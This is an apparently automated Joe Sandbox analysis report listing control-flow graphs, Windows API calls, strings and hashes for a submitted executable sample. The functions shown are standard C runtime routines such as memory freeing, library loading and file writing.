                                                                                              control_flow_graph 1776 6ce25518-6ce2552c 1777 6ce2559a-6ce255a2 1776->1777 1778 6ce2552e-6ce25533 1776->1778 1780 6ce255a4-6ce255a7 1777->1780 1781 6ce255e9-6ce25601 call 6ce25689 1777->1781 1778->1777 1779 6ce25535-6ce2553a 1778->1779 1779->1777 1782 6ce2553c-6ce2553f 1779->1782 1780->1781 1784 6ce255a9-6ce255e6 call 6ce22e33 * 4 1780->1784 1791 6ce25604-6ce2560b 1781->1791 1782->1777 1785 6ce25541-6ce25549 1782->1785 1784->1781 1789 6ce25563-6ce2556b 1785->1789 1790 6ce2554b-6ce2554e 1785->1790 1793 6ce25585-6ce25599 call 6ce22e33 * 2 1789->1793 1794 6ce2556d-6ce25570 1789->1794 1790->1789 1795 6ce25550-6ce25562 call 6ce22e33 call 6ce27448 1790->1795 1796 6ce2562a-6ce2562e 1791->1796 1797 6ce2560d-6ce25611 1791->1797 1793->1777 1794->1793 1799 6ce25572-6ce25584 call 6ce22e33 call 6ce27546 1794->1799 1795->1789 1800 6ce25630-6ce25635 1796->1800 1801 6ce25646-6ce25652 1796->1801 1804 6ce25613-6ce25616 1797->1804 1805 6ce25627 1797->1805 1799->1793 1808 6ce25643 1800->1808 1809 6ce25637-6ce2563a 1800->1809 1801->1791 1811 6ce25654-6ce2565f call 6ce22e33 1801->1811 1804->1805 1813 6ce25618-6ce25626 call 6ce22e33 * 2 1804->1813 1805->1796 1808->1801 1809->1808 1816 6ce2563c-6ce25642 call 6ce22e33 1809->1816 1813->1805 1816->1808
                                                                                              APIs
                                                                                              • ___free_lconv_mon.LIBCMT ref: 6CE2555C
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27465
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27477
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27489
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE2749B
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274AD
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274BF
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274D1
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274E3
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE274F5
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27507
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE27519
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE2752B
                                                                                                • Part of subcall function 6CE27448: _free.LIBCMT ref: 6CE2753D
                                                                                              • _free.LIBCMT ref: 6CE25551
                                                                                                • Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
                                                                                                • Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B
                                                                                              • _free.LIBCMT ref: 6CE25573
                                                                                              • _free.LIBCMT ref: 6CE25588
                                                                                              • _free.LIBCMT ref: 6CE25593
                                                                                              • _free.LIBCMT ref: 6CE255B5
                                                                                              • _free.LIBCMT ref: 6CE255C8
                                                                                              • _free.LIBCMT ref: 6CE255D6
                                                                                              • _free.LIBCMT ref: 6CE255E1
                                                                                              • _free.LIBCMT ref: 6CE25619
                                                                                              • _free.LIBCMT ref: 6CE25620
                                                                                              • _free.LIBCMT ref: 6CE2563D
                                                                                              • _free.LIBCMT ref: 6CE25655
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                              • String ID:
                                                                                              • API String ID: 161543041-0
                                                                                              • Opcode ID: 9f669ac714b081050a6241eda2d476b85a5e7babd470c28c5a344cdc4243c919
                                                                                              • Instruction ID: f65c99ad02d5704e1c0550372b5432cb51f92d28b2da25613f497f0fb6fa3264
                                                                                              • Opcode Fuzzy Hash: 9f669ac714b081050a6241eda2d476b85a5e7babd470c28c5a344cdc4243c919
                                                                                              • Instruction Fuzzy Hash: 5A315C316052009FEB219A75E948FA673F9EF4032DF30895DE064DBB54DF78E9849B60

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1833 6ce226f3-6ce22706 1834 6ce22712-6ce227bf call 6ce22e33 * 9 call 6ce2251f call 6ce2258a 1833->1834 1835 6ce22708-6ce22711 call 6ce22e33 1833->1835 1835->1834
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 31c32b2a3e3ed4be8922d899d960c0fd26f6516585dbea66a79624492fbf81eb
                                                                                              • Instruction ID: 4bdbd78d6e420d61b112e36a293de28f37eddd6c59d12f1c5364dfae27dcc6c1
                                                                                              • Opcode Fuzzy Hash: 31c32b2a3e3ed4be8922d899d960c0fd26f6516585dbea66a79624492fbf81eb
                                                                                              • Instruction Fuzzy Hash: C4210A76910108AFCB02DF94C884EDD7BB8BF58254F50846AF5059F620DB75DA49DFC0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1860 6ce2435a-6ce24366 1861 6ce2440d-6ce24410 1860->1861 1862 6ce24416 1861->1862 1863 6ce2436b-6ce2437c 1861->1863 1866 6ce24418-6ce2441c 1862->1866 1864 6ce24389-6ce243a2 LoadLibraryExW 1863->1864 1865 6ce2437e-6ce24381 1863->1865 1869 6ce243f4-6ce243fd 1864->1869 1870 6ce243a4-6ce243ad GetLastError 1864->1870 1867 6ce24387 1865->1867 1868 6ce2440a 1865->1868 1871 6ce24406-6ce24408 1867->1871 1868->1861 1869->1871 1872 6ce243ff-6ce24400 FreeLibrary 1869->1872 1873 6ce243e4 1870->1873 1874 6ce243af-6ce243c1 call 6ce22493 1870->1874 1871->1868 1876 6ce2441d-6ce2441f 1871->1876 1872->1871 1875 6ce243e6-6ce243e8 1873->1875 1874->1873 1880 6ce243c3-6ce243d5 call 6ce22493 1874->1880 1875->1869 1878 6ce243ea-6ce243f2 1875->1878 1876->1866 1878->1868 1880->1873 1883 6ce243d7-6ce243e2 LoadLibraryExW 1880->1883 1883->1875
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: api-ms-$ext-ms-$l l
                                                                                              • API String ID: 0-4051029112
                                                                                              • Opcode ID: eedbaa982b1a4ecab0bcafae5ee3adc596c937665b129391b26957e9bd40408f
                                                                                              • Instruction ID: a8b5c52b80d9d2df8933f2222fdc0d990cdd15a52404dadbbdf27c04b3c5969c
                                                                                              • Opcode Fuzzy Hash: eedbaa982b1a4ecab0bcafae5ee3adc596c937665b129391b26957e9bd40408f
                                                                                              • Instruction Fuzzy Hash: DA21E771B46261ABCB128A298C84F4A7778AF1777CF350A23E815AB780D678ED0185E0

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 1884 6ce20cd0-6ce20d21 call 6ce29960 call 6ce20c90 call 6ce21117 1891 6ce20d23-6ce20d35 1884->1891 1892 6ce20d7d-6ce20d80 1884->1892 1894 6ce20da0-6ce20da9 1891->1894 1895 6ce20d37-6ce20d4e 1891->1895 1893 6ce20d82-6ce20d8f call 6ce21100 1892->1893 1892->1894 1900 6ce20d94-6ce20d9d call 6ce20c90 1893->1900 1897 6ce20d50-6ce20d5e call 6ce210a0 1895->1897 1898 6ce20d64 1895->1898 1907 6ce20d60 1897->1907 1908 6ce20d74-6ce20d7b 1897->1908 1899 6ce20d67-6ce20d6c 1898->1899 1899->1895 1902 6ce20d6e-6ce20d70 1899->1902 1900->1894 1902->1894 1905 6ce20d72 1902->1905 1905->1900 1909 6ce20d62 1907->1909 1910 6ce20daa-6ce20db3 1907->1910 1908->1900 1909->1899 1911 6ce20db5-6ce20dbc 1910->1911 1912 6ce20ded-6ce20dfd call 6ce210e0 1910->1912 1911->1912 1914 6ce20dbe-6ce20dcd call 6ce29800 1911->1914 1918 6ce20e11-6ce20e2d call 6ce20c90 call 6ce210c0 1912->1918 1919 6ce20dff-6ce20e0e call 6ce21100 1912->1919 1920 6ce20dea 1914->1920 1921 6ce20dcf-6ce20de7 1914->1921 1919->1918 1920->1912 1921->1920
                                                                                              APIs
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CE20D07
                                                                                              • ___except_validate_context_record.LIBVCRUNTIME ref: 6CE20D0F
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CE20D98
                                                                                              • __IsNonwritableInCurrentImage.LIBCMT ref: 6CE20DC3
                                                                                              • _ValidateLocalCookies.LIBCMT ref: 6CE20E18
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                              • String ID: csm
                                                                                              • API String ID: 1170836740-1018135373
                                                                                              • Opcode ID: 3587f757451a3699664023cca5f93ba05e8f4004948babd4dc7806fd2b9568a8
                                                                                              • Instruction ID: 7367f0a5e086b04da898835af5874eaa9e935942bd282f6a67fbd60c7c6f4933
                                                                                              • Opcode Fuzzy Hash: 3587f757451a3699664023cca5f93ba05e8f4004948babd4dc7806fd2b9568a8
                                                                                              • Instruction Fuzzy Hash: 58418134E012889FCF00CF69C890B9EBBB5AF4532CF348159E8149B791D73AEA15CB90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: -8l$C:\Users\user\Desktop\9cOUjp7ybm.exe
                                                                                              • API String ID: 0-1601642273
                                                                                              • Opcode ID: 144e491443d0a36ff5d715ced9e31366188119b2778d54a6cc0f80819b88a8f2
                                                                                              • Instruction ID: eff8ab9eb223e5523e3c4f7a2d040317bdd943547b7921a9c90802a009e7c269
                                                                                              • Opcode Fuzzy Hash: 144e491443d0a36ff5d715ced9e31366188119b2778d54a6cc0f80819b88a8f2
                                                                                              • Instruction Fuzzy Hash: 66217FB1604209AFDB109E698D90F5B77BDAF1136C7344619F564D7B40EB29DC058FA0
                                                                                              APIs
                                                                                                • Part of subcall function 6CE275AF: _free.LIBCMT ref: 6CE275D4
                                                                                              • _free.LIBCMT ref: 6CE27635
                                                                                                • Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
                                                                                                • Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B
                                                                                              • _free.LIBCMT ref: 6CE27640
                                                                                              • _free.LIBCMT ref: 6CE2764B
                                                                                              • _free.LIBCMT ref: 6CE2769F
                                                                                              • _free.LIBCMT ref: 6CE276AA
                                                                                              • _free.LIBCMT ref: 6CE276B5
                                                                                              • _free.LIBCMT ref: 6CE276C0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                              • Instruction ID: 7e39eb4d194b737b3eceb0329c4f8813d59e9505696633f40ef7639a40cd040b
                                                                                              • Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
                                                                                              • Instruction Fuzzy Hash: C6119332580B04BBD721A7B0CC09FDBB7BC5F51704F50482DA2D96AA90DB3CF5095790
                                                                                              APIs
                                                                                              • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE26748
                                                                                              • __fassign.LIBCMT ref: 6CE2692D
                                                                                              • __fassign.LIBCMT ref: 6CE2694A
                                                                                              • WriteFile.KERNEL32(?,6CE24EE3,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE26992
                                                                                              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CE269D2
                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CE26A7A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                                                              • String ID:
                                                                                              • API String ID: 1735259414-0
                                                                                              • Opcode ID: a8db25b6de835e4d0ef090bc33e0ec612fd1842380852bb482d807d73315890d
                                                                                              • Instruction ID: 1d1e079b9b04668b84b19837213af114fa70c25459107b32bcd392378f6aaa37
                                                                                              • Opcode Fuzzy Hash: a8db25b6de835e4d0ef090bc33e0ec612fd1842380852bb482d807d73315890d
                                                                                              • Instruction Fuzzy Hash: B3C180B5D052589FCB01CFA8C880AEDFBB9AF09318F28826AD855F7741D6359946CF60
                                                                                              APIs
                                                                                              • GetLastError.KERNEL32(00000001,?,6CE20E75,6CE1FFA0,6CE1F9B9,?,6CE1FBF1,?,00000001,?,?,00000001,?,6CE2F120,0000000C,6CE1FCEA), ref: 6CE211B5
                                                                                              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6CE211C3
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6CE211DC
                                                                                              • SetLastError.KERNEL32(00000000,6CE1FBF1,?,00000001,?,?,00000001,?,6CE2F120,0000000C,6CE1FCEA,?,00000001,?), ref: 6CE2122E
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLastValue___vcrt_
                                                                                              • String ID:
                                                                                              • API String ID: 3852720340-0
                                                                                              • Opcode ID: 04c7074b698592e581808d6c8e137bc6f65ec21e7665a568cf45b35c1d6ef65d
                                                                                              • Instruction ID: 973fdb435419fecfc48bf55ac7855b6b5c4a26a0e17d5e420c89d05086e7d1df
                                                                                              • Opcode Fuzzy Hash: 04c7074b698592e581808d6c8e137bc6f65ec21e7665a568cf45b35c1d6ef65d
                                                                                              • Instruction Fuzzy Hash: 83019E336096695EAB0506E56C88B9A36B4DB1767D330032EF52481BE0FB5BCE15A154
                                                                                              APIs
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CE213E4,00000000,?,00000001,00000000,?,6CE2145B,00000001,FlsFree,6CE2AD3C,FlsFree,00000000), ref: 6CE213B3
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: FreeLibrary
                                                                                              • String ID: api-ms-
                                                                                              • API String ID: 3664257935-2084034818
                                                                                              • Opcode ID: a5aa4b9051b02ea913e3cd9dfb79f93fed227bded74c4772a23bd2b758ce550e
                                                                                              • Instruction ID: 781e23f9d9f31edc4d44a8e80f0b76e79de318447b45a202872f45f62c5d7ba9
                                                                                              • Opcode Fuzzy Hash: a5aa4b9051b02ea913e3cd9dfb79f93fed227bded74c4772a23bd2b758ce550e
                                                                                              • Instruction Fuzzy Hash: 6F118A32F856259BDB128B998C44B5D77B5AF02778F360210E911E7B80D779EE0086D1
                                                                                              APIs
                                                                                              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CE2198C,?,?,6CE21954,?,00000001,?), ref: 6CE219EF
                                                                                              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CE21A02
                                                                                              • FreeLibrary.KERNEL32(00000000,?,?,6CE2198C,?,?,6CE21954,?,00000001,?), ref: 6CE21A25
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressFreeHandleLibraryModuleProc
                                                                                              • String ID: CorExitProcess$mscoree.dll
                                                                                              • API String ID: 4061214504-1276376045
                                                                                              • Opcode ID: 9e36dcad0473470b4dfb4432ccd50279b4a8d9a4c6c42cb3ab4f84259208b297
                                                                                              • Instruction ID: ac0310f99d3bb5b4eccc353342894b6fcfe96910b99f332c968b8282f96425ef
                                                                                              • Opcode Fuzzy Hash: 9e36dcad0473470b4dfb4432ccd50279b4a8d9a4c6c42cb3ab4f84259208b297
                                                                                              • Instruction Fuzzy Hash: 7BF01C72642118FBDF11AB90CD09F9EBA79EB4175AF204464E401B2651CB3DCF01DB91
                                                                                              APIs
                                                                                              • __alloca_probe_16.LIBCMT ref: 6CE2607C
                                                                                              • __alloca_probe_16.LIBCMT ref: 6CE26142
                                                                                              • __freea.LIBCMT ref: 6CE261AE
                                                                                                • Part of subcall function 6CE251AC: HeapAlloc.KERNEL32(00000000,6CE24EE3,6CE24EE3,?,6CE23BE3,00000220,?,6CE24EE3,?,?,?,?,6CE27002,00000001,?,?), ref: 6CE251DE
                                                                                              • __freea.LIBCMT ref: 6CE261B7
                                                                                              • __freea.LIBCMT ref: 6CE261DA
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: __freea$__alloca_probe_16$AllocHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1096550386-0
                                                                                              • Opcode ID: a8a32946c3ddeb789704d8d81097bfe2608281f64d6f7a8efbab6e12628c8684
                                                                                              • Instruction ID: 306abcdd802e1f951bfddd546147c0ddf61664955eed95d15f2c87676e88776d
                                                                                              • Opcode Fuzzy Hash: a8a32946c3ddeb789704d8d81097bfe2608281f64d6f7a8efbab6e12628c8684
                                                                                              • Instruction Fuzzy Hash: 2551C072501616ABEF218F548C41FAB36BDDF8575CF310219F918D7B41EB38EC1186A0
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 6CE2755E
                                                                                                • Part of subcall function 6CE22E33: HeapFree.KERNEL32(00000000,00000000,?,6CE2206C), ref: 6CE22E49
                                                                                                • Part of subcall function 6CE22E33: GetLastError.KERNEL32(?,?,6CE2206C), ref: 6CE22E5B
                                                                                              • _free.LIBCMT ref: 6CE27570
                                                                                              • _free.LIBCMT ref: 6CE27582
                                                                                              • _free.LIBCMT ref: 6CE27594
                                                                                              • _free.LIBCMT ref: 6CE275A6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                              • String ID:
                                                                                              • API String ID: 776569668-0
                                                                                              • Opcode ID: 1fe2c661f01ec57c7b807e3410b509241dab44b0cb3f28909504c3cd37852ecd
                                                                                              • Instruction ID: 1bd0e2aa2755ad574e2562a9e81d785ed6c6459dd8f3ec29f193d2a7bb19bb4a
                                                                                              • Opcode Fuzzy Hash: 1fe2c661f01ec57c7b807e3410b509241dab44b0cb3f28909504c3cd37852ecd
                                                                                              • Instruction Fuzzy Hash: 81F062319552149BCB11DB64E489EA7B3F9BB5432D3704849F464DBF00C738F980CAE4
                                                                                              APIs
                                                                                                • Part of subcall function 6CE26700: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 6CE26748
                                                                                              • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,6CE24EE3,?,00000000,00000000,6CE2F360,0000002C,6CE24F54,?), ref: 6CE270B3
                                                                                              • GetLastError.KERNEL32 ref: 6CE270BD
                                                                                              • __dosmaperr.LIBCMT ref: 6CE270FC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1743327219.000000006CE11000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CE10000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1743305065.000000006CE10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743356205.000000006CE2A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743376563.000000006CE30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.1743912678.000000006CE7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_6ce10000_9cOUjp7ybm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                                                              • String ID: TOl
                                                                                              • API String ID: 910155933-2836345119
                                                                                              • Opcode ID: d655123d3dea7d044b16025a19aca2ec4a22b3e58815691a0847328624681f2e
                                                                                              • Instruction ID: a02f41a2d8402425c168586c03c54564dd27e7be6e8e3dd95c77354279cc3d73
                                                                                              • Opcode Fuzzy Hash: d655123d3dea7d044b16025a19aca2ec4a22b3e58815691a0847328624681f2e
                                                                                              • Instruction Fuzzy Hash: 6751D372A50109ABEF11CFA4C845FDEBBB9AF4632CF340149E400ABB91D7799946CB60
                                                                                              APIs
                                                                                                • Part of subcall function 6CE23559: _free.LIBCMT ref: 6CE23567
                                                                                                • Part of subcall function 6CE2412D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,6CE261A4,?,00000000,00000000), ref: 6CE241D9
                                                                                              • GetLastError.KERNEL32 ref: 6CE22F9F
